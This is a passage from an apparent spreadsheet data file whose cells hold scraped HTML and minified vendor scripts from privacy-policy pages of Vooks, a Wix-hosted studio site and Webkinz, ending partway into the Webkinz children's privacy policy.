n=e.cache.cartLastSaved;e.cache.cartLastSaved=e.cache.cart,reqwest({url:"/cart/update.json",method:"post",type:"json",data:{attributes:{locksmith:e.cache.cart}},complete:t,error:function(t){if(e.cache.cartLastSaved=n,!e.reloading)throw t}})},e.util.spinnerHTML='&lt;style&gt;body{background:#FFF}@keyframes spin{from{transform:rotate(0deg)}to{transform:rotate(360deg)}}#loading{display:flex;width:100%;height:50vh;color:#777;align-items:center;justify-content:center}#loading .spinner{display:block;animation:spin 600ms linear infinite;position:relative;width:50px;height:50px}#loading .spinner-ring{stroke:currentColor;stroke-dasharray:100%;stroke-width:2px;stroke-linecap:round;fill:none}&lt;/style&gt;&lt;div id="loading"&gt;&lt;div class="spinner"&gt;&lt;svg width="100%" height="100%"&gt;&lt;svg preserveAspectRatio="xMinYMin"&gt;&lt;circle class="spinner-ring" cx="50%" cy="50%" r="45%"&gt;&lt;/circle&gt;&lt;/svg&gt;&lt;/svg&gt;&lt;/div&gt;&lt;/div&gt;',e.util.clobberBody=function(e){document.body.innerHTML=e},e.util.clobberDocument=function(e){e.responseText&amp;&amp;(e=e.responseText),document.documentElement&amp;&amp;document.removeChild(document.documentElement);var t=document.open("text/html","replace");t.writeln(e),t.close(),setTimeout(function(){var e=t.querySelector("[autofocus]");e&amp;&amp;e.focus()},100)},e.util.serializeForm=function(e){if(e&amp;&amp;"FORM"===e.nodeName){var t,n,s={};for(t=e.elements.length-1;t&gt;=0;t-=1)if(""!==e.elements[t].name)switch(e.elements[t].nodeName){case"INPUT":switch(e.elements[t].type){default:case"text":case"hidden":case"password":case"button":case"reset":case"submit":s[e.elements[t].name]=e.elements[t].value;break;case"checkbox":case"radio":e.elements[t].checked&amp;&amp;(s[e.elements[t].name]=e.elements[t].value);break;case"file":}break;case"TEXTAREA":s[e.elements[t].name]=e.elements[t].value;break;case"SELECT":switch(e.elements[t].type){case"select-one":s[e.elements[t].name]=e.elements[t].value;break;case"select-multiple":for(n=e.elements[t].options.length-1;n&gt;=0;n-=1)e.elements[t].options[n].selected&amp;&amp;(s[e.elements[t].name]=e.elements[t].options[n].value)}break;case"BUTTON":switch(e.elements[t].type){case"reset":case"submit":case"button":s[e.elements[t].name]=e.elements[t].value}}return s}},e.util.on=function(e,t,n,s){s=s||document;var r="locksmith-"+e+t,a=function(e){var s=e.target,a=e.target.parentElement,o=s.className.baseVal||s.className||"",i=a.className.baseVal||a.className||"";("string"==typeof o&amp;&amp;-1!==o.split(/\s+/).indexOf(t)||"string"==typeof i&amp;&amp;-1!==i.split(/\s+/).indexOf(t))&amp;&amp;!e[r]&amp;&amp;(e[r]=!0,n(e))};s.attachEvent?s.attachEvent(e,a):s.addEventListener(e,a,!1)},e.util.enableActions=function(t){e.util.on("click","locksmith-action",function(t){t.preventDefault();var n=t.target;(!n.dataset.confirmWith||confirm(n.dataset.confirmWith))&amp;&amp;(n.disabled=!0,n.innerText=n.dataset.disableWith,e.post("/action",n.dataset.locksmithParams,{spinner:!1,type:"text",success:function(t){t=JSON.parse(t.responseText),t.message&amp;&amp;alert(t.message),e.util.reload()}}))},t)},e.util.inject=function(e,t){var n=["data","locksmith","append"];if(-1!==t.indexOf(n.join("-"))){var s=document.createElement("div");s.innerHTML=t,e.appendChild(s)}else e.innerHTML=t;var r,a,o=e.querySelectorAll("script");for(a=0;a&lt;o.length;++a){r=o[a];var i=document.createElement("script");if(r.type&amp;&amp;(i.type=r.type),r.src)i.src=r.src;else{var l=document.createTextNode(r.innerHTML);i.appendChild(l)}e.appendChild(i)}var c=e.querySelector("[autofocus]");c&amp;&amp;c.focus()},e.post=function(t,n,s){s=s||{},s.spinner!==!1&amp;&amp;e.util.clobberBody(e.util.spinnerHTML);var r={};s.container===document?(r.layout=1,s.success=function(t){document.getElementById(s.container);e.util.clobberDocument(t)}):s.container&amp;&amp;(r.layout=0,s.success=function(t){var n=document.getElementById(s.container);e.util.inject(n,t),n.id===n.firstChild.id&amp;&amp;n.parentElement.replaceChild(n.firstChild,n)}),e.loading=!0;var a=e.util.makeUrl(t,r);reqwest({url:a,method:"post",type:s.type||"html",data:n,complete:function(){e.loading=!1},error:function(t){if(!e.reloading){if("dashboard.weglot.com"===window.location.host)return void console.error(t);if(s.silent)return void console.error(t);throw alert("Something went wrong! Please refresh and try again. "),t}},success:s.success||e.util.clobberDocument})},e.postResource=function(t,n){t.path=e.path,t.search=window.location.search,t.state=e.state,t.passcode&amp;&amp;(t.passcode=t.passcode.trim()),t.email&amp;&amp;(t.email=t.email.trim()),t.state.cart=e.cache.cart,t.locksmith_json=e.jsonTag,t.locksmith_json_signature=e.jsonTagSignature,e.post("/resource",t,n)},e.ping=function(t){if(!e.isEmbedded){t=t||{};var n=function(){t.reload?e.util.reload():"function"==typeof t.callback&amp;&amp;t.callback()};e.post("/ping",{path:e.path,search:window.location.search,state:e.state},{spinner:!!t.spinner,silent:"undefined"==typeof t.silent?!0:t.silent,type:"text",success:function(t){t=JSON.parse(t.responseText),t.messages&amp;&amp;t.messages.length&gt;0&amp;&amp;e.showMessages(t.messages),t.cart&amp;&amp;e.cache.cart!==t.cart?(e.cache.cart=t.cart,e.cache.saveCart(function(){n(),t.cart&amp;&amp;t.cart.match(/^.+:/)&amp;&amp;e.util.reload()})):n()}})}},e.showMessages=function(t){var n=document.createElement("div");n.style.position="fixed",n.style.left=0,n.style.right=0,n.style.bottom="-50px",n.style.opacity=0,n.style.background="#191919",n.style.color="#ddd",n.style.transition="bottom 0.2s, opacity 0.2s",n.style.zIndex=999999,n.innerHTML=" &lt;style&gt;          .locksmith-ab .locksmith-b { display: none; }          .locksmith-ab.toggled .locksmith-b { display: flex; }          .locksmith-ab.toggled .locksmith-a { display: none; }          .locksmith-flex { display: flex; flex-wrap: wrap; justify-content: space-between; align-items: center; padding: 10px 20px; }          .locksmith-message + .locksmith-message { border-top: 1px #555 solid; }          .locksmith-message a { color: inherit; font-weight: bold; }          .locksmith-message a:hover { color: inherit; opacity: 0.8; }          a.locksmith-ab-toggle { font-weight: inherit; text-decoration: underline; }          .locksmith-text { flex-grow: 1; }          .locksmith-cta { flex-grow: 0; text-align: right; }          .locksmith-cta button { transform: scale(0.8); transform-origin: left; }          .locksmith-cta &gt; * { display: block; }          .locksmith-cta &gt;</t>
  </si>
  <si>
    <t>* + * { margin-top: 10px; }          .locksmith-message a.locksmith-close { flex-grow: 0; text-decoration: none; margin-left: 15px; font-size: 30px; font-family: monospace; display: block; padding: 2px 10px; }                    @media screen and (max-width: 600px) {             .locksmith-wide-only { display: none !important; }            .locksmith-flex { padding: 0 15px; }            .locksmith-flex &gt; * { margin-top: 5px; margin-bottom: 5px; }            .locksmith-cta { text-align: left; }          }                    @media screen and (min-width: 601px) {            .locksmith-narrow-only { display: none !important; }          }&lt;/style&gt;      "+t.map(function(e){return'&lt;div class="locksmith-message"&gt;'+e+"&lt;/div&gt;"}).join(""),document.body.appendChild(n),document.body.style.position="relative",document.body.parentElement.style.paddingBottom=""+n.offsetHeight+"px",setTimeout(function(){n.style.bottom=0,n.style.opacity=1},50),e.util.on("click","locksmith-ab-toggle",function(e){e.preventDefault();for(var t=e.target.parentElement;-1===t.className.split(" ").indexOf("locksmith-ab");)t=t.parentElement;-1!==t.className.split(" ").indexOf("toggled")?t.className=t.className.replace("toggled",""):t.className=t.className+" toggled"}),e.util.enableActions(n)}}()}();&lt;/script&gt; &lt;script data-locksmith&gt;Locksmith.cache.cart=null&lt;/script&gt; &lt;script data-locksmith&gt;Locksmith.jsonTag="\u003cscript type=\"application\/vnd.locksmith+json\" data-locksmith\u003e{\"version\":\"v6.29\",\"locked\":false,\"initialized\":true,\"scope\":\"page\",\"access_granted\":true,\"access_denied\":false,\"requires_customer\":false,\"manual_lock\":false,\"server_lock\":false,\"server_rendered\":null,\"hide_resource\":false,\"hide_links_to_resource\":false,\"transparent\":true,\"locks\":{\"all\":[],\"opened\":[]},\"keys\":[],\"keys_signature\":\"a8bef49344089342b691c118bf3a55fbb21ae6796baebfb09eb45351cddc209b\",\"state\":{\"template\":\"page\",\"theme\":131681288342,\"product\":null,\"collection\":null,\"page\":\"privacy\",\"blog\":null,\"article\":null,\"app\":null},\"now\":1681304807,\"path\":\"\\\/pages\\\/privacy\",\"locale_root_url\":\"\\\/\",\"canonical_url\":\"https:\\\/\\\/www.vooks.com\\\/pages\\\/privacy\",\"customer_id\":null,\"customer_id_signature\":\"a8bef49344089342b691c118bf3a55fbb21ae6796baebfb09eb45351cddc209b\",\"cart\":null}\u003c\/script\u003e";Locksmith.jsonTagSignature="96b4f1f0ea2a7a90cf43520ae91776417a6f4858435cd24633b9c4ae461b0211"&lt;/script&gt; &lt;meta charset="utf-8"&gt; &lt;meta http-equiv="cleartype" content="on"&gt; &lt;meta name="robots" content="index,follow"&gt; &lt;!--</t>
  </si>
  <si>
    <t>Mobile Specific Metas --&gt; &lt;meta name="HandheldFriendly" content="True"&gt; &lt;meta name="MobileOptimized" content="320"&gt; &lt;meta name="viewport" content="width=device-width,initial-scale=1"&gt; &lt;meta name="theme-color" content="#ffffff"&gt; &lt;title&gt;
      Privacy Policy - Vooks&lt;/title&gt;
&lt;meta name="description" content="Privacy Policy   Last updated January 01, 2020  Welcome to Vooks, provided and maintained by Vooks Inc., (referred to hereinafter as, “Vooks,” or “Company,” or “We,” or “Us,” or “Our”), an online educational platform that provides individuals, families and schools with an online streaming library of animated children’s"/&gt; &lt;!-- Preconnect Domains --&gt; &lt;link rel="preconnect" href="https://fonts.shopifycdn.com" /&gt; &lt;link rel="preconnect" href="https://cdn.shopify.com" /&gt; &lt;link rel="preconnect" href="https://v.shopify.com" /&gt; &lt;link rel="preconnect" href="https://cdn.shopifycloud.com" /&gt; &lt;link rel="preconnect" href="https://monorail-edge.shopifysvc.com"&gt; &lt;!-- fallback for browsers that don't support preconnect --&gt; &lt;link rel="dns-prefetch" href="https://fonts.shopifycdn.com" /&gt; &lt;link rel="dns-prefetch" href="https://cdn.shopify.com" /&gt; &lt;link rel="dns-prefetch" href="https://v.shopify.com" /&gt; &lt;link rel="dns-prefetch" href="https://cdn.shopifycloud.com" /&gt; &lt;link rel="dns-prefetch" href="https://monorail-edge.shopifysvc.com"&gt; &lt;!--</t>
  </si>
  <si>
    <t>Preload Assets --&gt; &lt;link rel="preload" href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/fancybox.css?v=19278034316635137701671035333" as="style"&gt; &lt;link rel="preload" href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/styles.css?v=127519896926745096131671136125" as="style"&gt; &lt;link rel="preload" href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/jquery.min.js?v=81049236547974671631671035333" as="script"&gt; &lt;link rel="preload" href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/vendors.js?v=51772124549495699811671035333" as="script"&gt; &lt;link rel="preload" href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/sections.js?v=156327425418679169711671035333" as="script"&gt; &lt;link rel="preload" href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/utilities.js?v=111216385206935921311671136125" as="script"&gt; &lt;link rel="preload" href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/app.js?v=162882354372697959611671035333" as="script"&gt; &lt;!-- Stylesheet for Fancybox library --&gt; &lt;link href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/fancybox.css?v=19278034316635137701671035333" rel="stylesheet" type="text/css" media="all" /&gt; &lt;!-- Stylesheets for Turbo --&gt; &lt;link href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/fonts.css?v=29554253696905959711671035333" rel="stylesheet" type="text/css" media="all" /&gt; &lt;link href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/styles.css?v=127519896926745096131671136125" rel="stylesheet" type="text/css" media="all" /&gt; &lt;link href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/custom.css?v=27337302052289567801671035333" rel="stylesheet" type="text/css" media="all" /&gt;
	&lt;link href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/custom2.css?v=49007433502236186261671126874" rel="stylesheet" type="text/css" media="all" /&gt; &lt;link href="//cdn.shopify.com/s/files/1/0454/4597/2118/t/36/assets/2022-redesign.css?v=47264115875182585611673101897" rel="stylesheet" type="text/css" media="all" /&gt; &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">GA4 GLOBAL CODE --&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-STXWZEK77E"&gt;&lt;/script&gt;
&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-STXWZEK77E');
&lt;/script&gt; &lt;script&gt;
      </t>
  </si>
  <si>
    <t>window.lazySizesConfig = window.lazySizesConfig || {};
      lazySizesConfig.expand = 300;
      lazySizesConfig.loadHidden = false;
       /*! lazysizes - v5.2.2 - bgset plugin */
      !function(e,t){var a=function(){t(e.lazySizes),e.removeEventListener("lazyunveilread",a,!0)};t=t.bind(null,e,e.document),"object"==typeof module&amp;&amp;module.exports?t(require("lazysizes")):"function"==typeof define&amp;&amp;define.amd?define(["lazysizes"],t):e.lazySizes?a():e.addEventListener("lazyunveilread",a,!0)}(window,function(e,z,g){"use strict";var c,y,b,f,i,s,n,v,m;e.addEventListener&amp;&amp;(c=g.cfg,y=/\s+/g,b=/\s*\|\s+|\s+\|\s*/g,f=/^(.+?)(?:\s+\[\s*(.+?)\s*\])(?:\s+\[\s*(.+?)\s*\])?$/,i=/^\s*\(*\s*type\s*:\s*(.+?)\s*\)*\s*$/,s=/\(|\)|'/,n={contain:1,cover:1},v=function(e,t){var a;t&amp;&amp;((a=t.match(i))&amp;&amp;a[1]?e.setAttribute("type",a[1]):e.setAttribute("media",c.customMedia[t]||t))},m=function(e){var t,a,i,r;e.target._lazybgset&amp;&amp;(a=(t=e.target)._lazybgset,(i=t.currentSrc||t.src)&amp;&amp;((r=g.fire(a,"bgsetproxy",{src:i,useSrc:s.test(i)?JSON.stringify(i):i})).defaultPrevented||(a.style.backgroundImage="url("+r.detail.useSrc+")")),t._lazybgsetLoading&amp;&amp;(g.fire(a,"_lazyloaded",{},!1,!0),delete t._lazybgsetLoading))},addEventListener("lazybeforeunveil",function(e){var t,a,i,r,s,n,l,d,o,u;!e.defaultPrevented&amp;&amp;(t=e.target.getAttribute("data-bgset"))&amp;&amp;(o=e.target,(u=z.createElement("img")).alt="",u._lazybgsetLoading=!0,e.detail.firesLoad=!0,a=t,i=o,r=u,s=z.createElement("picture"),n=i.getAttribute(c.sizesAttr),l=i.getAttribute("data-ratio"),d=i.getAttribute("data-optimumx"),i._lazybgset&amp;&amp;i._lazybgset.parentNode==i&amp;&amp;i.removeChild(i._lazybgset),Object.defineProperty(r,"_lazybgset",{value:i,writable:!0}),Object.defineProperty(i,"_lazybgset",{value:s,writable:!0}),a=a.replace(y," ").split(b),s.style.display="none",r.className =c.lazyClass,1!=a.length||n||(n="auto"),a.forEach(function(e){var t,a=z.createElement("source");n&amp;&amp;"auto"!=n&amp;&amp;a.setAttribute("sizes",n),(t=e.match(f))?(a.setAttribute(c.srcsetAttr,t[1]),v(a,t[2]),v(a,t[3])):a.setAttribute(c.srcsetAttr,e),s.appendChild(a)}),n&amp;&amp;(r.setAttribute(c.sizesAttr,n),i.removeAttribute(c.sizesAttr),i.removeAttribute("sizes")),d&amp;&amp;r.setAttribute("data-optimumx",d),l&amp;&amp;r.setAttribute("data-ratio",l),s.appendChild(r),i.appendChild(s),setTimeout(function(){g.loader.unveil(u),g.rAF(function(){g.fire(u,"_lazyloaded",{},!0,!0),u.complete&amp;&amp;m({target:u})})}))}),z.addEventListener("load",m,!0),e.addEventListener("lazybeforesizes",function(e){var t,a,i,r;e.detail.instance==g&amp;&amp;e.target._lazybgset&amp;&amp;e.detail.dataAttr&amp;&amp;(t=e.target._lazybgset,i=t,r=(getComputedStyle(i)||{getPropertyValue:function(){}}).getPropertyValue("background-size"),!n[r]&amp;&amp;n[i.style.backgroundSize]&amp;&amp;(r=i.style.backgroundSize),n[a=r]&amp;&amp;(e.target._lazysizesParentFit=a,g.rAF(function(){e.target.setAttribute("data-parent-fit",a),e.target._lazysizesParentFit&amp;&amp;delete e.target._lazysizesParentFit})))},!0),z.documentElement.addEventListener("lazybeforesizes",function(e){var t,a;!e.defaultPrevented&amp;&amp;e.target._lazybgset&amp;&amp;e.detail.instance==g&amp;&amp;(e.detail.width=(t=e.target._lazybgset,a=g.gW(t,t.parentNode),(!t._lazysizesWidth||a&gt;t._lazysizesWidth)&amp;&amp;(t._lazysizesWidth=a),t._lazysizesWidth))}))});
      /*! lazysizes - v5.2.2 */
      !function(e){var t=function(u,D,f){"use strict";var k,H;if(function(){var e;var t={lazyClass:"lazyload",loadedClass:"lazyloaded",loadingClass:"lazyloading",preloadClass:"lazypreload",errorClass:"lazyerror",autosizesClass:"lazyautosizes",srcAttr:"data-src",srcsetAttr:"data-srcset",sizesAttr:"data-sizes",minSize:40,customMedia:{},init:true,expFactor:1.5,hFac:.8,loadMode:2,loadHidden:true,ricTimeout:0,throttleDelay:125};H=u.lazySizesConfig||u.lazysizesConfig||{};for(e in t){if(!(e in H)){H[e]=t[e]}}}(),!D||!D.getElementsByClassName){return{init:function(){},cfg:H,noSupport:true}}var O</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
  &lt;meta charset='utf-8'&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1" id="wixDesktopViewport" /&gt;
  &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
  &lt;meta name="generator" content="Wix.com Website Builder"/&gt;
  &lt;link rel="icon" sizes="192x192" href="https://static.wixstatic.com/media/0e42b9_4b1d5907257a43f48dc79529867520c6%7Emv2.png/v1/fill/w_32%2Ch_32%2Clg_1%2Cusm_0.66_1.00_0.01/0e42b9_4b1d5907257a43f48dc79529867520c6%7Emv2.png"&gt;
  &lt;link rel="shortcut icon" href="https://static.wixstatic.com/media/0e42b9_4b1d5907257a43f48dc79529867520c6%7Emv2.png/v1/fill/w_32%2Ch_32%2Clg_1%2Cusm_0.66_1.00_0.01/0e42b9_4b1d5907257a43f48dc79529867520c6%7Emv2.png" type="image/png"/&gt;
  &lt;link rel="apple-touch-icon" href="https://static.wixstatic.com/media/0e42b9_4b1d5907257a43f48dc79529867520c6%7Emv2.png/v1/fill/w_32%2Ch_32%2Clg_1%2Cusm_0.66_1.00_0.01/0e42b9_4b1d5907257a43f48dc79529867520c6%7Emv2.png" type="image/png"/&gt;
  &lt;!-- Safari Pinned Tab Icon --&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel="mask-icon" href="https://static.wixstatic.com/media/0e42b9_4b1d5907257a43f48dc79529867520c6%7Emv2.png/v1/fill/w_32%2Ch_32%2Clg_1%2Cusm_0.66_1.00_0.01/0e42b9_4b1d5907257a43f48dc79529867520c6%7Emv2.png"&gt; --&gt;
  &lt;!-- Legacy Polyfills --&gt;
  &lt;script nomodule="" src="https://static.parastorage.com/unpkg/core-js-bundle@3.2.1/minified.js"&gt;&lt;/script&gt;
  &lt;script nomodule="" src="https://static.parastorage.com/unpkg/focus-within-polyfill@5.0.9/dist/focus-within-polyfill.js"&gt;&lt;/script&gt;
  &lt;script nomodule="" src="https://polyfill.io/v3/polyfill.min.js?features=fetch"&gt;&lt;/script&gt;
  &lt;!-- Performance API Polyfills --&gt;
  &lt;script&gt;
  (function () {
    var noop = function noop() {};
    if ("performance" in window === false) {
      window.performance = {};
    }
    window.performance.mark = performance.mark || noop;
    window.performance.measure = performance.measure || noop;
    if ("now" in window.performance === false) {
      var nowOffset = Date.now();
      if (performance.timing &amp;&amp; performance.timing.navigationStart) {
        nowOffset = performance.timing.navigationStart;
      }
      window.performance.now = function now() {
        return Date.now() - nowOffset;
      };
    }
  })();
  &lt;/script&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Sentry --&gt;
  &lt;script id="sentry"&gt;
    (function(c,t,u,n,p,l,y,z,v){if(c[l] &amp;&amp; c[l].mute) {return;}function e(b){if(!w){w=!0;var d=t.getElementsByTagName(u)[0],a=t.createElement(u);a.src=z;a.crossorigin="anonymous";a.addEventListener("load",function(){try{c[n]=q;c[p]=r;var a=c[l],d=a.init;a.init=function(a){for(var b in a)Object.prototype.hasOwnProperty.call(a,b)&amp;&amp;(v[b]=a[b]);d(v)};B(b,a)}catch(A){console.error(A)}});d.parentNode.insertBefore(a,d)}}function B(b,d){try{for(var a=0;a&lt;b.length;a++)if("function"===typeof b[a])b[a]();var f=m.data,g=!1,h=!1;for(a=0;a&lt;f.length;a++)if(f[a].f){h=!0;var e=f[a];!1===g&amp;&amp;"init"!==e.f&amp;&amp;d.init();g=!0;d[e.f].apply(d,e.a)}!1===h&amp;&amp;d.init();var k=c[n],l=c[p];for(a=0;a&lt;f.length;a++)f[a].e&amp;&amp;k?k.apply(c,f[a].e):f[a].p&amp;&amp;l&amp;&amp;l.apply(c,[f[a].p])}catch(C){console.error(C)}}for(var g=!0,x=!1,k=0;k&lt;document.scripts.length;k++)if(-1&lt;document.scripts[k].src.indexOf(y)){g="no"!==document.scripts[k].getAttribute("data-lazy");break}var w=!1,h=[],m=function(b){(b.e||b.p||b.f&amp;&amp;-1&lt;b.f.indexOf("capture")||b.f&amp;&amp;-1&lt;b.f.indexOf("showReportDialog"))&amp;&amp;g&amp;&amp;e(h);m.data.push(b)};m.data=[];c[l]={onLoad:function(b){h.push(b);g&amp;&amp;!x||e(h)},forceLoad:function(){x=!0;g&amp;&amp;setTimeout(function(){e(h)})}};"init addBreadcrumb captureMessage captureException captureEvent configureScope withScope showReportDialog".split(" ").forEach(function(b){c[l][b]=function(){m({f:b,a:arguments})}});var q=c[n];c[n]=function(b,d,a,f,e){m({e:[].slice.call(arguments)});q&amp;&amp;q.apply(c,arguments)};var r=c[p];c[p]=function(b){m({p:b.reason});r&amp;&amp;r.apply(c,arguments)};g||setTimeout(function(){e(h)})})(window,document,"script","onerror","onunhandledrejection","Sentry","605a7baede844d278b89dc95ae0a9123","https://browser.sentry-cdn.com/6.18.2/bundle.min.js",{"dsn":"https://605a7baede844d278b89dc95ae0a9123@sentry-next.wixpress.com/68"});
  &lt;/script&gt;
  &lt;!-- sendFedopsLoadStarted.inline --&gt;
  &lt;script type="application/json" id="wix-fedops"&gt;{"data":{"site":{"metaSiteId":"f79762c3-aea8-46bc-b489-fcc2371d1d5d","userId":"0e42b93f-9eb3-4500-91b5-5ef2485398d0","siteId":"7ee35ba5-1278-4c72-bf33-fecf5dd09341","externalBaseUrl":"https:\/\/www.stonegolemstudio.com","siteRevision":919,"siteType":"UGC","dc":"42","isResponsive":false,"sessionId":"d39ba95c-1ee9-45b4-a05e-b454c1298444"},"rollout":{"siteAssetsVersionsRollout":false,"isDACRollout":0,"isTBRollout":false},"fleetConfig":{"fleetName":"thunderbolt-renderer-light","type":"GA","code":0},"requestUrl":"https:\/\/www.stonegolemstudio.com\/privacywearamon","isInSEO":false,"platformOnSite":true}}&lt;/script&gt;
  &lt;script&gt;window.fedops = JSON.parse(document.getElementById('wix-fedops').textContent)&lt;/script&gt;
  &lt;script data-url="https://static.parastorage.com/services/wix-thunderbolt/dist/ab-test-compilation/webpack-runtime.0494ec67.bundle.min.js"&gt;!function(){"use strict";var e,n,t,a,r,o={},i={};function d(e){var n=i[e];if(void 0!==n)return n.exports;var t=i[e]={id:e,loaded:!1,exports:{}};return o[e].call(t.exports,t,t.exports,d),t.loaded=!0,t.exports}d.m=o,e=[],d. O=function(n,t,a,r){if(!t){var o=1/0;for(u=0;u&lt;e.length;u++){t=e[u][0],a=e[u][1],r=e[u][2];for(var i=!0,s=0;s&lt;t.length;s++)(!1&amp;r||o&gt;=r)&amp;&amp;Object.keys(d.O).every((function(e){return d.O[e](t[s])}))?t.splice(s--,1):(i=!1,r&lt;o&amp;&amp;(o=r));if(i){e.splice(u--,1);var c=a();void 0!==c&amp;&amp;(n=c)}}return n}r=r||0;for(var u=e.length;u&gt;0&amp;&amp;e[u-1][2]&gt;r;u--)e[u]=e[u-1];e[u]=[t,a,r]},d.n=function(e){var n=e&amp;&amp;e.__esModule?function(){return e.default}:function(){return e};return</t>
  </si>
  <si>
    <t>Viewer Model --&gt;
  &lt;script type="application/json" id</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;style&gt;
#blankPage {
	background-color: #FFFFFF;
	font-family: arial;
	margin: 15px;
}
&lt;/style&gt;_x005F_x000D_
&lt;script type="text/javascript"&gt;_x005F_x000D_
	function printCurrentPage(){_x005F_x000D_
		window.print();_x005F_x000D_
	}_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;div id="blankPage"&gt;_x005F_x000D_
 	&lt;div id="post-827644" class="post-827644 page type-page status-publish hentry"&gt;_x005F_x000D_
		&lt;div style="float: right; "&gt;&lt;img src="https://webkinznewz.ganzworld.com/wp-content/themes/wkn/images/print-button.png" onclick="printCurrentPage();" style="cursor: pointer;"/&gt;&lt;/div&gt;_x005F_x000D_
		&lt;div class="entry-content"&gt;_x005F_x000D_
		&lt;p&gt;&lt;strong&gt;WEBKINZ CHILDREN'S PRIVACY POLICY&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;READ BEFORE DISCLOSING INFORMATION&lt;/p&gt;
&lt;p&gt;Last Updated on: December 8th, 2021&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt; This Children’s Privacy Policy (“Privacy Policy”) applies to webkinz.com, the Webkinz Desktop App and Webkinz-branded mobile games and applications on which it is posted (collectively and individually, “Webkinz Service”)&lt;/strong&gt;, &lt;strong&gt;regardless of how you access or use them, whether via personal computers, mobile devices or otherwise.   You should read this entire Privacy Policy, but here is a partial list of some of the key topics.  </t>
  </si>
  <si>
    <t xml:space="preserve">Any capitalized terms have the meanings given to them where defined in the Privacy Policy.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt; We ask you for, and use Tracking Technologies (defined below) to detect information about you and your usage of the Webkinz Service, and third parties may also do so in connection with our Service.   Click &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s1"&gt;&lt;strong&gt;here&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; for details.  </t>
  </si>
  <si>
    <t xml:space="preserve">We do not detect or make any changes to your experience on the Webkinz Service if your browser is set to send so-called browser “do not track”&lt;/strong&gt; &lt;strong&gt;signals. You may have certain other options regarding cookies and tracking.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt; We do not condition user’s participation in any Webkinz Service activity on the user’s disclosure of more Personal Information (defined below) than is reasonably required and is permitted by law and we comply with the U.S. Children’s Online Privacy Protection Act (“COPPA”) and the Canadian Personal Information Protection and Electronic Documents Act (“PIPEDA”).  </t>
  </si>
  <si>
    <t xml:space="preserve">Click &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s2"&gt;&lt;strong&gt;here&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; for details&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt; We do not disclose user information we collect on the Webkinz Service to third parties for Online Behavioral Advertising (“OBA”) or serve OBA ads on the Webkinz Service. Click &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s3"&gt;&lt;strong&gt;here&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; for details on advertising on the Webkinz Service.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>&lt;ul&gt;
&lt;li&gt;&lt;strong&gt; Your California Privacy Rights: This Privacy Policy contains special provisions for users residing in California.</t>
  </si>
  <si>
    <t>If these are applicable to you, please review them carefully. Click &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s4"&gt;&lt;strong&gt;here&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; for details.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt; You consent to our practices is detailed in our Privacy Policy.</t>
  </si>
  <si>
    <t>Each time you use the Webkinz Services, the version of our Privacy Policy then posted will apply to that use, subject to &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s4"&gt;&lt;strong&gt;Section 7&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;, so you should check back each time you return for updates to prospectively change your consent, delete your account, stop using the Webkinz Service and uninstall any downloads and apps.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
 &lt;ul&gt;
&lt;li&gt;&lt;strong&gt; The Privacy Policy includes the following sections, click to link directly to them:&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;         1.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s6"&gt;&lt;strong&gt;What Information Do We Collect and How Do We Use It?&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;                           &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s7"&gt;&lt;strong&gt;(a)</t>
  </si>
  <si>
